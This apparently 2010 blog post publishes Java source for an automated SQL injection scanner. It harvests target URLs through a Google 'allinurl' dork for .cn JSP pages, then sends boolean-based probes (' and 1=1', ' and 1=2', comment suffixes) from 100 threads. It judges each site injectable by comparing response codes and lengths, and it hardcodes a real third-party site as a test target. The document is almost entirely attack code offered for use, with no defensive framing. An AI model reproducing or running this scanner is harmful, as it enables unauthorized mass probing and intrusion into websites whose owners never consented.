|
|
Posted on 2010-09-26 16:21 shnulaa 阅读(191) 评论(0) 编辑 收藏
Main.java
 package cn.liuyq.sql.injection.main;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.UnsupportedEncodingException;
import java.net.HttpURLConnection;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.TreeSet;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import cn.liuyq.sql.injection.task.InjectionTask;
  public class Main  {
private static final String START_SEARCH_KEY_WORD = "<font color=\"green\">";
private static final String END_SEARCH_KEY_WORD = "</font>";
private static final String GOODLE_SERACH_PART_ONE = "http://www.google.com.hk/search?num=100&hl=zh-CN&newwindow=1&safe=strict&q=";
private static final String GOODLE_SERACH_PART_TWO = "&btnG=Google+%E6%90%9C%E7%B4%A2&meta=&aq=f&aqi=&aql=&oq=&gs_rfai=&start=0";
private static final String REQUEST_PROPERTY_KEY = "User-Agent";
private static final String REQUEST_PROPERTY_VALUE = "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)";
  public static void main(String[] args) throws Throwable {
System.setProperty( "org.apache.commons.logging.Log", "org.apache.commons.logging.impl.NoOpLog" );
String searchKeyWord = "allinurl: .cn/jsp?id=";
int threadCount = 100;
List<InjectionTask> searchedUrl = getMactchedAddress(searchKeyWord);
// int index = 0;
// for (InjectionTask injectionTask : searchedUrl) {
// System.out.println(index++);
// System.out.println(injectionTask.toString());
// }
runTask(searchedUrl, threadCount);
 }
private static List<InjectionTask> getMactchedAddress(String searchKeyWord) throws MalformedURLException,
IOException, UnsupportedEncodingException {
searchKeyWord = searchKeyWord.replace("?", "%3F").replace("=", "%3D")
.replace(":", "%3A").replace(" ", "+");
URL url = new URL(GOODLE_SERACH_PART_ONE + searchKeyWord
+ GOODLE_SERACH_PART_TWO);
HttpURLConnection con = null;
InputStream is = null;
try {
con = (HttpURLConnection) url.openConnection();
con.setRequestProperty(REQUEST_PROPERTY_KEY,REQUEST_PROPERTY_VALUE);
is = con.getInputStream();
BufferedReader br = new BufferedReader(new InputStreamReader(is,
"GB2312"));
String lineStr = null;
StringBuilder sb = new StringBuilder();
while ((lineStr = br.readLine()) != null) {
sb.append(lineStr);
}
List<InjectionTask> searchedUrl = new ArrayList<InjectionTask>(
new TreeSet<InjectionTask>());
Map<String, InjectionTask> checkDuplicate = new HashMap<String, InjectionTask>();
String responseStr = sb.toString();
int position, beginPosition = 0;
while ((position = responseStr.indexOf(START_SEARCH_KEY_WORD,
beginPosition)) > 0) {
int start = position + START_SEARCH_KEY_WORD.length();
String matched = responseStr.substring(start,
responseStr.indexOf(END_SEARCH_KEY_WORD, start))
.replace("%3F", "?").replace("%3D", "=").replace("%26",
"&");
if (matched.lastIndexOf("-") > 0) {
matched = matched
.substring(0, matched.lastIndexOf("-") - 1);
InjectionTask injectTask = new InjectionTask(new URL(
matched));
if (!checkDuplicate.containsKey(injectTask.getHost())) {
searchedUrl.add(injectTask);
checkDuplicate.put(injectTask.getHost(), injectTask);
}
}
beginPosition = position;
beginPosition += START_SEARCH_KEY_WORD.length()
+ matched.length() + END_SEARCH_KEY_WORD.length();
}
return searchedUrl;
} finally {
if (is != null) {
is.close();
}
}
}
public static void runTask(List<InjectionTask> searchedUrl, int threadCount)
throws Throwable {
ExecutorService service = null;
try {
service = Executors.newFixedThreadPool(threadCount);
service.invokeAll(searchedUrl);
} finally {
if (service != null) {
service.shutdown();
}
}
}
 }
InjectionTask.java
package cn.liuyq.sql.injection.task;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.Callable;
import cn.liuyq.sql.injection.main.Main;
import cn.liuyq.sql.injection.util.Util;
public class InjectionTask implements Callable<Object> {
private static final long serialVersionUID = 1L;
public InjectionTask(URL url) {
this.url = url;
}
public String getHost() {
return this.url.getHost();
}
private URL url;
@SuppressWarnings("static-access")
@Override
/** *//**
* 1
*/
public Object call() throws Exception {
try {
if (Util.confirmInjection(this.url.toString()))
System.out.println(this.url.toString() + "--------true");
Thread.currentThread().sleep(200);
} catch (Throwable e) {
}
return null;
}
@Override
public String toString() {
return this.url.toString();
}
public static void main(String[] args) throws Throwable {
List<InjectionTask> taskList = new ArrayList<InjectionTask>();
taskList.add(new InjectionTask(new URL(
"http://www.spddr.com/spddr/spddr_indexw.jsp?id=18%20and%201=1")));
Main.runTask(taskList, 100);
Util.post("http://www.spddr.com/spddr/spddr_indexw.jsp?id=18" );
Util.post("http://www.spddr.com/spddr/spddr_indexw.jsp?id=18%20and%201=1" );
Util.post("http://www.spddr.com/spddr/spddr_indexw.jsp?id=18%20and%201=2");
}
}
Util.java
1package cn.liuyq.sql.injection.util;
2
3import java.io.BufferedReader;
4import java.io.IOException;
5import java.io.InputStream;
6import java.io.InputStreamReader;
7import java.net.HttpURLConnection;
8import java.net.URL;
9
10import org.apache.commons.httpclient.DefaultHttpMethodRetryHandler;
11import org.apache.commons.httpclient.HttpClient;
12import org.apache.commons.httpclient.HttpStatus;
13import org.apache.commons.httpclient.methods.GetMethod;
14import org.apache.commons.httpclient.params.HttpClientParams;
15import org.apache.commons.httpclient.params.HttpMethodParams;
16
17public class Util {
18
19 private static final int HTTP_SOCKET_TIMEOUT = 5000;
20 private static final String REQUEST_PROPERTY_KEY = "User-Agent";
21 private static final String REQUEST_PROPERTY_VALUE = "Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)";
22// private static Map<String,Integer> streamLenghtMap = new Hashtable<String,Integer>();
23
24 private static final String[] INJECTION_SQL_ARRAY = new String[] {
25 " and 1=1",
26 " and 1=2",
27 " #123",
28 " --123"
29 };
30
31 public static void main(String[] args) throws Throwable {
32 System.out.println(confirmInjection("http://192.168.1.83:9090/Test/segment.do?id=2051"));
33// System.out.println(openConnection("http://192.168.1.83:9090/Test/segment.do?id=2051"));
34 }
35
36 public static DatabaseType confirmDataBase(String url) {
37 return DatabaseType.ORACLE;
38 }
39
40 /** *//**
41 *
42 * @return
43 */
44 public static boolean confirmInjection(String url) throws Throwable {
45 boolean canDo = false;
46 int[] result1 = post(url);
47 if (result1[0] == HttpStatus.SC_OK) {
48 String replacedUrl1 = replaceBlank(url + INJECTION_SQL_ARRAY[0]);
49 String replacedUrl2 = replaceBlank(url + INJECTION_SQL_ARRAY[1]);
50 int[] result2 = post(replacedUrl1);
51 int[] result3 = post(replacedUrl2);
52 if (result1[0] == result2[0] && result2[0] != result3[0]) {
53 return true;
54 } else if (result1[0] == HttpStatus.SC_OK
55 && result2[0] == HttpStatus.SC_OK
56 && result3[0] == HttpStatus.SC_OK) {
57 if (
58 result1[1] == result2[1] &&
59 result2[1] != result3[1]) {
60 return true;
61 }
62 }
63 }
64 return canDo;
65 }
66
67 public static int[] post(String url) {
68 int[] result = new int[2];
69 HttpClientParams hcp = new HttpClientParams();
70 hcp.setSoTimeout(HTTP_SOCKET_TIMEOUT);
71
72 HttpClient client = new HttpClient(hcp);
73
74 client.getParams().setParameter(HttpMethodParams.RETRY_HANDLER,
75 new DefaultHttpMethodRetryHandler(0, false));
76 client.getParams().setParameter(HttpMethodParams.USER_AGENT,
77 REQUEST_PROPERTY_VALUE);
78
79 GetMethod get = new GetMethod(url);
80 try {
81 result[0] = client.executeMethod(get);
82 result[1] = new String(get.getResponseBody()).length();
83 } catch (Throwable e) {
84 } finally {
85 if (get != null) {
86 get.releaseConnection();
87 }
88 }
89 return result;
90 }
91
92 public static String openConnection(String url) {
93 StringBuilder sb = new StringBuilder();
94 HttpURLConnection con = null;
95 InputStream is = null;
96 try {
97 con = (HttpURLConnection) new URL(url).openConnection();
98 con.setRequestProperty(REQUEST_PROPERTY_KEY,
99 REQUEST_PROPERTY_VALUE);
100
101 is = con.getInputStream();
102 BufferedReader br = new BufferedReader(new InputStreamReader(is,
103 "GB2312"));
104 String lineStr = null;
105
106 while ((lineStr = br.readLine()) != null) {
107 sb.append(lineStr);
108 }
109 } catch (Throwable e) {
110 } finally {
111 if (is != null) {
112 try {
113 is.close();
114 } catch (IOException e) {
115 }
116 }
117 }
118 return sb.toString();
119 }
120
121
122 public static String replaceBlank(String url) {
123 return url.replace(" ", "%20");
124 }
125
126 public enum DatabaseType {
127 ORACLE(),MSSQL(),MYSQL();
128 }
129}
130
|